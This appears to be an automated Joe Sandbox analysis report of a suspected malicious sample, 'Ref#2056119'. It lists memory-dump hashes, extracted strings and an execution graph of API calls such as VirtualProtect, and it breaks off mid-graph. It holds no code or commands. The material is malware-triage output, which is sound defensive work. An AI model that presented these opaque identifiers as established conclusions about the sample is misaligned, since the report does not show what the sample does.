                                                                                  • Source File: 00000000.00000002.2054942667.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7140000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Tekq
                                                                                  • API String ID: 0-2319236580
                                                                                  • Opcode ID: b4824065bde6ab71eb7f2d41b327e37e5a667410d030aa4347b22be981340df6
                                                                                  • Instruction ID: 3c494dfa27c7d2c3de38d5054c61257728cb6ac6bdaf537e72cd75ab71892796
                                                                                  • Opcode Fuzzy Hash: b4824065bde6ab71eb7f2d41b327e37e5a667410d030aa4347b22be981340df6
                                                                                  • Instruction Fuzzy Hash: B9B127B4E02218CFDB18DFA9D984B9DBBF2BF89304F108069D409A7395DB745985CF94
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2050360124.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_64f0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ZS,"
                                                                                  • API String ID: 0-123701881
                                                                                  • Opcode ID: 958c3992532d9f79bd3f7cd49f17490bb855ba6618891493b51b19b26e26a6d4
                                                                                  • Instruction ID: 6a0f75d61e87944b083486fed316ae50bb42cf760f36ae2fc0f8e5a28172a710
                                                                                  • Opcode Fuzzy Hash: 958c3992532d9f79bd3f7cd49f17490bb855ba6618891493b51b19b26e26a6d4
                                                                                  • Instruction Fuzzy Hash: 00A18B78905218CFDB44DFA5D594AEEBBF2FB8A304F10812AE405AB396DB395C46CF50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: doq
                                                                                  • API String ID: 0-3318987180
                                                                                  • Opcode ID: 3d0e76ddf8bac0f62709db4da6c1096627026e0bd0e1aad1f9af962433bf9125
                                                                                  • Instruction ID: 51877131567ad70778748940ceaca0f6e8baaa51a127b66e3c0dca4145536d1e
                                                                                  • Opcode Fuzzy Hash: 3d0e76ddf8bac0f62709db4da6c1096627026e0bd0e1aad1f9af962433bf9125
                                                                                  • Instruction Fuzzy Hash: 239139B4E01219CFDB18DFA8D588BADBBF1FB4A308F114269D419A7384DB386985CF51
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: doq
                                                                                  • API String ID: 0-3318987180
                                                                                  • Opcode ID: f222f58ecca00d9e68bd94b4bba6604d83343f31ede01adf9f631c310800b290
                                                                                  • Instruction ID: f8c5cd66c0e49926857c1fe012cdb467cabbf73ca699cee2cde44d2588ec8cca
                                                                                  • Opcode Fuzzy Hash: f222f58ecca00d9e68bd94b4bba6604d83343f31ede01adf9f631c310800b290
                                                                                  • Instruction Fuzzy Hash: 9A913AB4D05219CFDB18DFA4D588BADBBF1FB4A308F115269D419A7384DB386985CF10
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4|pq
                                                                                  • API String ID: 0-198908290
                                                                                  • Opcode ID: 864e68c6043f008551f5197ec8f9da8a10b4df5ebf799677d644b13fad11f267
                                                                                  • Instruction ID: bf26737d8af7d6b505e92d0a6b36d3b7933aa53a3360504848bb2aa10d06f9e9
                                                                                  • Opcode Fuzzy Hash: 864e68c6043f008551f5197ec8f9da8a10b4df5ebf799677d644b13fad11f267
                                                                                  • Instruction Fuzzy Hash: 1881F6B4E05228CFDB58CF69C984BD9B7F2AB89304F4081AAD90DA7284DB355E85CF40
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4|pq
                                                                                  • API String ID: 0-198908290
                                                                                  • Opcode ID: f1da163c30cb4a015329666ddb63003a4e23daa4a6b4474020f07d1c5b87f126
                                                                                  • Instruction ID: e5f98498484bed75b2ef7a06bd0c8fea701e8e93aa49c0260c5ad3bf8105ec5a
                                                                                  • Opcode Fuzzy Hash: f1da163c30cb4a015329666ddb63003a4e23daa4a6b4474020f07d1c5b87f126
                                                                                  • Instruction Fuzzy Hash: 2271F5B4E05228CFDB58DF69D980BD9B7F2BB89304F5081AAD909A7384DB355E85CF40
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055147805.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7170000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: "
                                                                                  • API String ID: 0-123907689
                                                                                  • Opcode ID: e2ef62d9499c492f8fcab852c78478bb6eb487e22048d6c2df315fa9731b4362
                                                                                  • Instruction ID: 5eacb8ee7dd8979ec8b11738d7d746b9fdcbca3e45a458900588033a1ff7868d
                                                                                  • Opcode Fuzzy Hash: e2ef62d9499c492f8fcab852c78478bb6eb487e22048d6c2df315fa9731b4362
                                                                                  • Instruction Fuzzy Hash: BB512DB5E142188BDB19DF6AD84069DB7F7FFC9304F04C1AA9508A7294DB740A81CF44
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a45e6c33f51c584dbf676a4801059bf4d4f869ae70d607fe974d0f999a6cc7e0
                                                                                  • Instruction ID: 33ff7b974a0f3a737fe5bc1549987be871f9b9de3f8fc14dd7f91c4a09e1be61
                                                                                  • Opcode Fuzzy Hash: a45e6c33f51c584dbf676a4801059bf4d4f869ae70d607fe974d0f999a6cc7e0
                                                                                  • Instruction Fuzzy Hash: 9A0239B1B00616CFDB59CFA9C59466EFBF2FF88300F248529D96697381DB34A941CB84
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2030531870.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1330000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b5a13339e5ae2150d7b47f6238abc87062e18ebb24e7a6cc95d0a29bd6ceedda
                                                                                  • Instruction ID: 37a63731b6b66a7c62766a7cc98afaf5d950972a9d5c9db9e9bb4b7e7024ddb3
                                                                                  • Opcode Fuzzy Hash: b5a13339e5ae2150d7b47f6238abc87062e18ebb24e7a6cc95d0a29bd6ceedda
                                                                                  • Instruction Fuzzy Hash: C31296B2D81B658BD710CF25EA4C3893BB1BB45398BD04B09D1613B2E5D7B4A1EACF44
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5d5915a6d7a46cfed766764859e2c679e5af578299895a8d23bb9dce56e5d9b9
                                                                                  • Instruction ID: 13568a57d9def9b59aec0dda35495e45bef0e73a15d7b3ddf18a081bbe2431df
                                                                                  • Opcode Fuzzy Hash: 5d5915a6d7a46cfed766764859e2c679e5af578299895a8d23bb9dce56e5d9b9
                                                                                  • Instruction Fuzzy Hash: D1C14BB4E01218CFDB18DFA9D494BADB7F6FB8A304F10916AD819A7394DB346946CF40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 278126ac5c3a4c1c8551d9c73b1dc94494a54fa0633797c99d349cff36eac61b
                                                                                  • Instruction ID: 9754099fac20d5f91906d1603b3fd2751b89fc95117d6861fdd1bd4aaf07c75b
                                                                                  • Opcode Fuzzy Hash: 278126ac5c3a4c1c8551d9c73b1dc94494a54fa0633797c99d349cff36eac61b
                                                                                  • Instruction Fuzzy Hash: C5C15AB4E01218CFDB18EFA9D494BADB7F6FB89304F10916AD419A7394DB346986CF40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2030531870.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1330000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3422ae412c33ff117611aa1ddce2354b2b9c43e9ddbe6fe9f73612a48dd70a88
                                                                                  • Instruction ID: 163ea3d42d3b725b530ab52ac1096741e9d306d1cfbe8f9cf0d432dde056f134
                                                                                  • Opcode Fuzzy Hash: 3422ae412c33ff117611aa1ddce2354b2b9c43e9ddbe6fe9f73612a48dd70a88
                                                                                  • Instruction Fuzzy Hash: 00A17E36E002198FCF0ADFA8C44459EBBB2FFC4304B15457AE906AB261DB31E956CB94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c00a05a10b7273d7dec0aaa3daa2c71f604f46d47af7b91a8d27b37cb7f1404d
                                                                                  • Instruction ID: 35e73cbead42573bd957c57c2274174457debbfdcaadfc918cd085845bd30957
                                                                                  • Opcode Fuzzy Hash: c00a05a10b7273d7dec0aaa3daa2c71f604f46d47af7b91a8d27b37cb7f1404d
                                                                                  • Instruction Fuzzy Hash: 8091E7B4A01219DFCB18DFA9D444AEEBBF5BF89310F14816AE409AB354D731AD46CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2030531870.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1330000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 040b0d8f906addf8a65c9320c1033ee4b005adde8702bc218bac63542e95f16a
                                                                                  • Instruction ID: 36330b8faed68b7d4b502a884b47355477ce47851b7c95e8be0dbaf7074093ca
                                                                                  • Opcode Fuzzy Hash: 040b0d8f906addf8a65c9320c1033ee4b005adde8702bc218bac63542e95f16a
                                                                                  • Instruction Fuzzy Hash: 6AC12DB1D81B658BD710CF25EA483893BB1FB85394F904B09D1617B2E4DBB4A0EACF44
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 474d20b315a1a70c33770f89cb1b822e8a13862a1ceabbd6554b66693db19cb0
                                                                                  • Instruction ID: bb50de9c1c5e3d6eef492be00b3f833bb441ed9e1dc3f4de3c4bfcd506702407
                                                                                  • Opcode Fuzzy Hash: 474d20b315a1a70c33770f89cb1b822e8a13862a1ceabbd6554b66693db19cb0
                                                                                  • Instruction Fuzzy Hash: 8A9169B4E54218CFDB08DFA9D488BADBBF1FF4A304F509269D419A7294DB34A885CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ae1ff29756c22e4907213bcc33c4a836cfe8b5c910c6f5d71c52a63384bec3f8
                                                                                  • Instruction ID: 152abd1239a349df6f1fe9a59110b2aba3d5ec63a6edb766303cd2db7f3cd596
                                                                                  • Opcode Fuzzy Hash: ae1ff29756c22e4907213bcc33c4a836cfe8b5c910c6f5d71c52a63384bec3f8
                                                                                  • Instruction Fuzzy Hash: 4C916AB4E54218CFCB18DFA9D584BADBBF1FF8A304F509269D419A7294DB34A881CF40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7c7f47eb1248ae8f71e83b63308fe15bd85bfca4c098e8046ff31a88bbaf1cbd
                                                                                  • Instruction ID: 0cfc192c34a50f44c6954d90d12ce7af968e2ad949701b10f19bfae33017ae6b
                                                                                  • Opcode Fuzzy Hash: 7c7f47eb1248ae8f71e83b63308fe15bd85bfca4c098e8046ff31a88bbaf1cbd
                                                                                  • Instruction Fuzzy Hash: D8815BB4E44218CFDB08DFA9D588BADBBF1FF4A304F509269D419A7294DB34A881CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9434d63b67ad1545193a80af549c3bbdbc59ced5fc1a3f614cd90b03438a8e91
                                                                                  • Instruction ID: 59d1134947ba898b6b77d87b59ae32ba2ee36073dda2b0ec816b4fd6c93a43d5
                                                                                  • Opcode Fuzzy Hash: 9434d63b67ad1545193a80af549c3bbdbc59ced5fc1a3f614cd90b03438a8e91
                                                                                  • Instruction Fuzzy Hash: 1D81E8B4E01219DFCB18DF99D480AEEBBF1BF88300F10852AE409AB354D735A946CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e650e41a9f27282e9da2bcf8a678e586d86ae6c44eb78bd2e2cb03b4319200b3
                                                                                  • Instruction ID: f77e82c1b2bf251f9def37b2f5d8c9726c82cbbde82ee8f4d5a20853ca7ef8bc
                                                                                  • Opcode Fuzzy Hash: e650e41a9f27282e9da2bcf8a678e586d86ae6c44eb78bd2e2cb03b4319200b3
                                                                                  • Instruction Fuzzy Hash: 5B5125B4D05218CFDB18DFA9D5857EDBBF2EB4A308F204129D829B7284D7786946CF04
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cd9ff8f94a97abd185196b207dd357f18ac4ebcf1bf96533228459335f9e4c42
                                                                                  • Instruction ID: 32684e72bec5e26d768a74fe416d40f7f22837ae1443fa8e897b627c7f0f4fbe
                                                                                  • Opcode Fuzzy Hash: cd9ff8f94a97abd185196b207dd357f18ac4ebcf1bf96533228459335f9e4c42
                                                                                  • Instruction Fuzzy Hash: 055105B4D05218CFDB18DFA9D5847EDBBF2EB4A308F115129D829B7284D7786946CF04
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2054942667.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7140000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: eb968b0695c912d5f840822cf511bc6a69c95fb199c8f976ef44e14a6459866c
                                                                                  • Instruction ID: d87c94c43f4baf80792ea72c6a4170338576c3eccbd82a0baf743f629681c5f3
                                                                                  • Opcode Fuzzy Hash: eb968b0695c912d5f840822cf511bc6a69c95fb199c8f976ef44e14a6459866c
                                                                                  • Instruction Fuzzy Hash: D55188B1E016598BDB08CFABC94059EFBF3BFC8200F18C07AD948AB265EB3459458B54
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2054422216.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70a0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d7ac51ab780d912323733b133b7eb95f7c537408db4040971b4ae9e89e732942
                                                                                  • Instruction ID: c156f9a78ae956455599217be69e31a1c9d6cb201158fb1ed2a4876f5882721b
                                                                                  • Opcode Fuzzy Hash: d7ac51ab780d912323733b133b7eb95f7c537408db4040971b4ae9e89e732942
                                                                                  • Instruction Fuzzy Hash: AA515EB1D056598BE76CCF6B8D4079AFAF3AFC9300F14C1FA940CAA664DB700A859F40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055147805.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7170000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cab3a500ee4e77b9140ad01b41142bc9fa4fe52e557974010a25fb06ee8f6635
                                                                                  • Instruction ID: c314ef6da4635d75677c001aa7b3e2f89cb2f06d51b9327cf2c82c6400fe4892
                                                                                  • Opcode Fuzzy Hash: cab3a500ee4e77b9140ad01b41142bc9fa4fe52e557974010a25fb06ee8f6635
                                                                                  • Instruction Fuzzy Hash: 9B41E4F0D452688BDB29CFAAC9447DDBBF2AF89300F14C1A9D409AB295DB344A85CF40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055147805.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7170000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ae1ab1f001e451f60e2ad02c2c49805278862a4255ba309d6e7fafd8dd66bd2c
                                                                                  • Instruction ID: 0329838e68555b0f3701b8856f660afb6c95d4d6e26909ce0d3093840fe8cb20
                                                                                  • Opcode Fuzzy Hash: ae1ab1f001e451f60e2ad02c2c49805278862a4255ba309d6e7fafd8dd66bd2c
                                                                                  • Instruction Fuzzy Hash: F54154B0D026298BEB68CF56CC59799FAF2BF89304F14C1A9D40CA6294DB744A85CF51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058988226.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_75a0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 38b1fea27cac88df890d0c751e61a306a1a3a2296e972ef220ded3c144ecd221
                                                                                  • Instruction ID: fa7fb61c68ef6505f5509dcff59961f83ae5ad735d753670bf80ce0d8259f052
                                                                                  • Opcode Fuzzy Hash: 38b1fea27cac88df890d0c751e61a306a1a3a2296e972ef220ded3c144ecd221
                                                                                  • Instruction Fuzzy Hash: 7E314A71D056558BE729CF6A89443DABBF7AFC5300F18C0FBD44CA6256EB340A8A8F50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055147805.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7170000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a2c313ca5ad922d5ff3315538599a89148cd783f7b1127a51bd7fb9aedbb3117
                                                                                  • Instruction ID: 4d568fda7148554fc1f5bf4a2841b2507351c7a303cbbba8ca414ff5b44de501
                                                                                  • Opcode Fuzzy Hash: a2c313ca5ad922d5ff3315538599a89148cd783f7b1127a51bd7fb9aedbb3117
                                                                                  • Instruction Fuzzy Hash: 6731E8B1D056588BEB59CF6BCC453CAFBF3AF89310F14C1AAD408AA265DB740A85CF51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058988226.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_75a0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 78e7acb120d3b19d4568b1f94a3137d9b66ca8b788913d12ac1f57ea434623ad
                                                                                  • Instruction ID: d8d1a84e2713b7c610bbdd658fecdd3e24eb41dba54d3f4a52167dc866dbc7a4
                                                                                  • Opcode Fuzzy Hash: 78e7acb120d3b19d4568b1f94a3137d9b66ca8b788913d12ac1f57ea434623ad
                                                                                  • Instruction Fuzzy Hash: EC311EB0E052198BD768CF6AC9446DAB7F6BF89304F04C5FA950DA7255EB344A858F10
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055147805.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7170000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b94e2611df7d442936e54c1adf514fa09d00648ca07b6bb0ad3434260e266dc7
                                                                                  • Instruction ID: f422bcd9d4637a9c010ee471c65a291775d7d6c23530220da4992ac981e19833
                                                                                  • Opcode Fuzzy Hash: b94e2611df7d442936e54c1adf514fa09d00648ca07b6bb0ad3434260e266dc7
                                                                                  • Instruction Fuzzy Hash: 9031DFB1E156598BE71DCF2B8C40699FBF7AFC9200F04C1FA9518A6255DB300A86CF54
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055147805.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7170000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 35afc085f25be7d9cffb35a70d0158193ce3ecf558004e11b97dfa887445494b
                                                                                  • Instruction ID: 4062518286b6ea39bc56fef26ab0690b82d06b18a2f7ff176d52da4cff82b938
                                                                                  • Opcode Fuzzy Hash: 35afc085f25be7d9cffb35a70d0158193ce3ecf558004e11b97dfa887445494b
                                                                                  • Instruction Fuzzy Hash: 1411B3B1D046588BEB29CF6BDD446D9FBF7AFC9300F14C0BA9809AA264DB340985CF41
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (oq$4'kq$4'kq$4'kq$4'kq$poq
                                                                                  • API String ID: 0-755401861
                                                                                  • Opcode ID: cd3a0409f5e6354e82752a0f4b14785df6a41eb4bd04a33a40eb7a06879c76ef
                                                                                  • Instruction ID: cfe4d7e963f456dfd2871144be2d2e376fd00caff6a6e16f45d68598c16cba67
                                                                                  • Opcode Fuzzy Hash: cd3a0409f5e6354e82752a0f4b14785df6a41eb4bd04a33a40eb7a06879c76ef
                                                                                  • Instruction Fuzzy Hash: F451E4B0A402498FC719DB7985506AFBBE7BFC8300F24497DC0499B3A5DF35AC468791

                                                                                  Execution Graph

                                                                                  Execution Coverage:12.3%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:446
                                                                                  Total number of Limit Nodes:23
                                                                                  execution_graph 66910 5d4b254 66911 5d4a9c2 66910->66911 66914 5d897e0 66911->66914 66919 5d897d0 66911->66919 66915 5d897f5 66914->66915 66924 5d89820 66915->66924 66929 5d89811 66915->66929 66916 5d8980b 66916->66911 66920 5d897e0 66919->66920 66922 5d89820 2 API calls 66920->66922 66923 5d89811 2 API calls 66920->66923 66921 5d8980b 66921->66911 66922->66921 66923->66921 66926 5d8984d 66924->66926 66925 5d89aa3 66925->66916 66926->66925 66927 5d89498 VirtualProtect 66926->66927 66928 5d894a0 VirtualProtect 66926->66928 66927->66926 66928->66926 66931 5d89820 66929->66931 66930 5d89aa3 66930->66916 66931->66930 66932 5d89498 VirtualProtect 66931->66932 66933 5d894a0 VirtualProtect 66931->66933 66932->66931 66933->66931 67220 91a230 67221 91a23f 67220->67221 67224 91a328 67220->67224 67229 91a317 67220->67229 67225 91a35c 67224->67225 67226 91a339 67224->67226 67225->67221 67226->67225 67227 91a560 GetModuleHandleW 67226->67227 67228 91a58d 67227->67228 67228->67221 67230 91a35c 67229->67230 67232 91a339 67229->67232 67230->67221 67231 91a560 GetModuleHandleW 67233 91a58d 67231->67233 67232->67230 67232->67231 67233->67221 66934 5d4ac56 66935 5d4ac60 66934->66935 66939 6a261a8 66935->66939 66944 6a26199 66935->66944 66936 5d4ac9e 66940 6a261bd 66939->66940 66943 6a261d3 66940->66943 66950 6a264b6 66940->66950 66955 6a267c4 66940->66955 66943->66936 66945 6a261a2 66944->66945 66947 6a26160 66944->66947 66946 6a261d3 66945->66946 66948 6a264b6 10 API calls 66945->66948 66949 6a267c4 10 API calls 66945->66949 66946->66936 66947->66936 66948->66946 66949->66946 66952 6a264c5 66950->66952 66951 6a26245 66951->66943 66952->66951 66960 6a27788 66952->66960 66965 6a27778 66952->66965 66956 6a26245 66955->66956 66957 6a2663c 66955->66957 66956->66943 66957->66956 66958 6a27788 10 API calls 66957->66958 66959 6a27778 10 API calls 66957->66959 66958->66956 66959->66956 66961 6a2778e 66960->66961 66964 6a277bf 66961->66964 66970 6a27b05 66961->66970 66975 6a27bc1 66961->66975 66964->66951 66966 6a27788 66965->66966 66967 6a277bf 66966->66967 66968 6a27bc1 10 API calls 66966->66968 66969 6a27b05 10 API calls 66966->66969 66967->66951 66968->66967 66969->66967 66971 6a27b1d 66970->66971 66981 6a28080 66971->66981 66994 6a28090 66971->66994 66972 6a27843 66972->66964 66976 6a27b04 66975->66976 66977 6a27bcb 66975->66977 66979 6a28080 10 API calls 66976->66979 66980 6a28090 10 API calls 66976->66980 66978 6a27843 66978->66964 66979->66978 66980->66978 66982 6a28090 66981->66982 67007 